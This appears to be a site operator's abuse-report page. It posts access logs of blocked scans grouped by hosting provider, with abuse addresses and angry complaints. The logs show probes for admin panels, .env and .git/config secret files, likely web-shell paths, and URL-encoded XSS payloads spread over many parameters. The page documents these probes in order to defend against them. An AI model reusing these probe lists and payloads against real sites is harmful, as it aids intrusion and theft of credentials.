77.68.123.43 website*x.com – – [14/Sep/2025:03:17:26 +0200] „GET /login HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:26 +0200] „GET /admin HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:26 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:26 +0200] „GET /wp-login HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:26 +0200] „GET /enter HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:26 +0200] „GET /panel HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:26 +0200] „GET /dashboard HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:26 +0200] „GET /admin-login HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:26 +0200] „GET /login.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:27 +0200] „GET /user-login HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:27 +0200] „GET /admin.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:27 +0200] „GET /secret HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:27 +0200] „GET /signin HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:27 +0200] „GET /portal HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:28 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:28 +0200] „GET /my-admin HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:28 +0200] „GET /adminpanel HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“

AS396982 – Google LLC – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!
HERE THIS VERY STUPID HACKER-IDIOT IS SEARCH FOR UNSECURE .JS-FILES!!!
34.56.168.155 website*x.com – – [14/Sep/2025:07:35:21 +0200] „GET /media/system/js/core.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
34.56.168.155 website*x.com – – [14/Sep/2025:07:35:21 +0200] „GET /wp-includes/js/jquery/jquery.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“

MAIL NR. 12 SONNTAG

abuse@m247.ro, abuse@virtualine.org

AS9009 – M247 Europe SRL – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ALWAYS ANSWERED IN OUR ABUSE EMAILS! THIS IS VERY GOOD!
193.176.86.134 website*x.de – – [14/Sep/2025:14:24:50 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0“

AS214943 – Railnet LLC – HERE WITH 2 IP´s! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
213.209.157.93 website*x.de – – [14/Sep/2025:03:26:57 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „msnbot/1.0 ( http://search.msn.com/msnbot.htm)“
+
213.209.157.253 website*x.de – – [14/Sep/2025:13:35:48 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 9; EML-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36“

MAIL NR. 13 SONNTAG

abuse@h2.nexus,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com

AS215730 – H2NEXUS LTD – HERE WITH 2 IP´S!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:22 +0200] „GET /.env.prod.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (SS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:22 +0200] „GET /.env.backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:22 +0200] „GET /.env.development.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:22 +0200] „GET /.env.example HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:22 +0200] „GET /.env.production HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:22 +0200] „GET /.env.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:23 +0200] „GET /.env.prod HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Debian; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:23 +0200] „GET /.env.old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:23 +0200] „GET /.env_1 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:23 +0200] „GET /.env.save HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Knoppix; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:23 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Fedora; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:24 +0200] „GET /.env_sample HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:24 +0200] „GET /.env.stage HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:25 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:25 +0200] „GET /.env.dev.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Kubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:25 +0200] „GET /.env.www HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (CentOS; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:25 +0200] „GET /.env.website*x HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:25 +0200] „GET /.env.live HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:26 +0200] „GET /.env. HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:26 +0200] „GET /.env.bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36“
87.120.93.78 website*x.com – – [14/Sep/2025:04:21:26 +0200] „GET /.env.dev HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/100.0 Safari/537.36“
87.120.93.78 website*x.com – – [14/Sep/2025:04:25:01 +0200] „GET /?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E&copy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15“
87.120.93.78 website*x.com – – [14/Sep/2025:04:25:01 +0200] „GET /?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
87.120.93.78 website*x.com – – [14/Sep/2025:04:25:01 +0200] „GET /?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Debian; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0“
and so on… and so on…!!! VERY UNSECURE PROVIDER!!!
+
94.156.232.48 website*x.com – – [14/Sep/2025:06:15:30 +0200] „GET /.env.development.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36“
94.156.232.48 website*x.com – – [14/Sep/2025:06:15:30 +0200] „GET /.env.example HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Debian; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0“
94.156.232.48 website*x.com – – [14/Sep/2025:06:15:30 +0200] „GET /.env.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
94.156.232.48 website*x.com – – [14/Sep/2025:06:15:30 +0200] „GET /.env.prod HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
94.156.232.48 website*x.com – – [14/Sep/2025:06:15:30 +0200] „GET /.env.prod.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36“
94.156.232.48 website*x.com – – [14/Sep/2025:06:15:30 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36“
94.156.232.48 website*x.com – – [14/Sep/2025:06:15:30 +0200] „GET /.env.dev.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0“
94.156.232.48 website*x.com – – [14/Sep/2025:06:15:30 +0200] „GET /.env.production HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36“
94.156.232.48 website*x.com – – [14/Sep/2025:06:15:30 +0200] „GET /.env.production.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
94.156.232.48 website*x.com – – [14/Sep/2025:06:23:46 +0200] „GET /?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E HTTP/1.0“ 403 – „-“ „Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.4 Safari/605.1.15“
94.156.232.48 website*x.com – – [14/Sep/2025:06:23:46 +0200] „GET /?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Debian; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0“
94.156.232.48 website*x.com – – [14/Sep/2025:06:23:46 +0200] „GET /?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E&note=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0“
94.156.232.48 website*x.com – – [14/Sep/2025:06:23:46 +0200] „GET /?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134“
and so on… and so on…!!! VERY UNSECURE PROVIDER!!!

AS8075 – Microsoft Corporation – HERE WITH 2 IP´S!!! – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
40.69.93.192 website*x.de – – [14/Sep/2025:03:54:30 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“
+
135.225.82.247 website*x.de – – [14/Sep/2025:04:07:20 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“

MAIL NR. 14 SONNTAG

abuse@m247.ro,abuse@virtualine.org,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com

AS214943 – Railnet LLC – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
213.209.157.253 website*x.de – – [14/Sep/2025:02:53:32 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 YaBrowser/19.3.1.828 Yowser/2.5 Safari/537.36“

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
52.178.159.75 website*x.de – – [14/Sep/2025:02:55:52 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
52.178.159.75 www.website*x.de – – [14/Sep/2025:02:56:23 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“

AS9009 – M247 Europe SRL – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ALWAYS ANSWERED IN OUR ABUSE EMAILS! THIS IS VERY GOOD!
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:39 +0200] „GET /inputs.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:39 +0200] „GET /images/class-config.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:40 +0200] „GET /wp-content/1.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:40 +0200] „GET /mar.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:40 +0200] „GET /wp-content/themes/about.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:40 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:40 +0200] „GET /text.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:41 +0200] „GET /buy.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:41 +0200] „GET /function/function.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
146.70.192.182 website*x.de – – [14/Sep/2025:06:36:41 +0200] „GET /as.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
